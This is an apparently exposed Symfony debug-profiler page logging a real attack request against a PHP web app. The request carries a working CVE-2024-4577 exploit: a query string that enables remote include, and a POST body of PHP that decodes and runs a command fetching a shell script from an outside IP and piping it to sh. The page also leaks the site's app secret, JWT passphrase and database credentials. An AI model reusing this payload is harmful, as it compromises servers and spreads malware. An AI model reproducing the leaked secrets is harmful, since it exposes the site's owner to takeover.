http://3.231.139.148/?%ADd%20allow_url_include%3D1%20%ADd%20auto_prepend_file%3Dphp%3A%2F%2Finput=

HomeController :: index

Request

GET Parameters

Key Value
�d_allow_url_include=1_�d_auto_prepend_file=php://input
""

POST Parameters

Key Value
<?php_shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vNDYuMTUxLjE4Mi44Mi9zaCB8fCBjdXJsIC1zayBodHRwczovLzQ2LjE1MS4xODIuODIvc2gpIHwgc2ggLXMgY3ZlXzIwMjRfNDU3Ny5zZWxmcmVw"));_echo(md5("Hello_CVE-2024-4577"));_?>
""

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller
"App\Domains\Shared\Application\Controller\HomeController::index"
_firewall_context
"security.firewall.map.context.main"
_route
"api_home"
_route_params
[]
_stopwatch_token
"21f831"

Request Headers

Header Value
accept
"*/*"
connection
"keep-alive"
content-length
"241"
content-type
"application/x-www-form-urlencoded"
host
"3.231.139.148"
upgrade-insecure-requests
"1"
user-agent
"libredtail-http"
x-php-ob-level
"0"

Request Content

Raw

<?php shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vNDYuMTUxLjE4Mi44Mi9zaCB8fCBjdXJsIC1zayBodHRwczovLzQ2LjE1MS4xODIuODIvc2gpIHwgc2ggLXMgY3ZlXzIwMjRfNDU3Ny5zZWxmcmVw")); echo(md5("Hello CVE-2024-4577")); ?>

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=UTF-8"
date
"Sat, 18 Apr 2026 19:40:42 GMT"
x-debug-token
"cc78fc"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV
"dev"
APP_SECRET
"638a97be5d457d459485cd148a941988f6db2bae74f8e43335af350c265d3d11"
JWT_PASSPHRASE
"cc1714db9795020202fc88842c5ed90ce0a6fe353e61d1a1866a68b334487dd7"
JWT_PUBLIC_KEY
"%kernel.project_dir%/config/jwt/public.pem"
JWT_SECRET_KEY
"%kernel.project_dir%/config/jwt/private.pem"
MAILER_DSN
"null://null"
MESSENGER_TRANSPORT_DSN
"doctrine://default?auto_setup=0"
OPENAI_API_KEY
""
REDIS_URL
"redis://redis:6379"
REPLICATE_API_KEY
""
USE_REAL_AI
"true"
USE_REAL_CHATGPT
"true"
VAR_DUMPER_SERVER
"127.0.0.1:9912"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
COMPOSER_HOME
"/var/www/html/.composer"
CONTENT_LENGTH
"241"
CONTENT_TYPE
"application/x-www-form-urlencoded"
DATABASE_URL
"mysql://app:app@database:3306/langcard?serverVersion=8.0"
DOCUMENT_ROOT
"/var/www/html/public"
DOCUMENT_URI
"/index.php"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
GPG_KEYS
"39B641343D8C104B2B146DC3F9C39DC0B9698544 E60913E4DF209907D8E30D96659A97C9CF2A795A 1198C0117593497A5EC5C199286AF1F9897469DC"
HOME
"/home/app"
HOSTNAME
"df1553a5bb35"
HTTP_ACCEPT
"*/*"
HTTP_CONNECTION
"keep-alive"
HTTP_CONTENT_LENGTH
"241"
HTTP_CONTENT_TYPE
"application/x-www-form-urlencoded"
HTTP_HOST
"3.231.139.148"
HTTP_UPGRADE_INSECURE_REQUESTS
"1"
HTTP_USER_AGENT
"libredtail-http"
OLDPWD
"/var/www/html"
PATH
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
PHPIZE_DEPS
"autoconf \t\tdpkg-dev \t\tfile \t\tg++ \t\tgcc \t\tlibc-dev \t\tmake \t\tpkg-config \t\tre2c"
PHP_ASC_URL
"https://www.php.net/distributions/php-8.2.30.tar.xz.asc"
PHP_CFLAGS
"-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64"
PHP_CPPFLAGS
"-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64"
PHP_INI_DIR
"/usr/local/etc/php"
PHP_LDFLAGS
"-Wl,-O1 -pie"
PHP_SELF
"/index.php"
PHP_SHA256
"bc90523e17af4db46157e75d0c9ef0b9d0030b0514e62c26ba7b513b8c4eb015"
PHP_URL
"https://www.php.net/distributions/php-8.2.30.tar.xz"
PHP_VERSION
"8.2.30"
PWD
"/var/www/html"
QUERY_STRING
"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_STATUS
"200"
REMOTE_ADDR
"212.132.98.35"
REMOTE_PORT
"38950"
REMOTE_USER
""
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"http"
REQUEST_TIME
1776541242
REQUEST_TIME_FLOAT
1776541242.314
REQUEST_URI
"/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
SCRIPT_FILENAME
"/var/www/html/public/index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"172.31.93.60"
SERVER_NAME
"api.thegoodtree.it.com"
SERVER_PORT
"80"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SOFTWARE
"nginx/1.24.0"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,MESSENGER_TRANSPORT_DSN,MAILER_DSN,VAR_DUMPER_SERVER,OPENAI_API_KEY,USE_REAL_CHATGPT,USE_REAL_AI,REPLICATE_API_KEY,JWT_SECRET_KEY,JWT_PUBLIC_KEY,JWT_PASSPHRASE,REDIS_URL"
USER
"app"
argc
4
argv
[
  "%ADd"
  "allow_url_include%3d1"
  "%ADd"
  "auto_prepend_file%3dphp://input"
]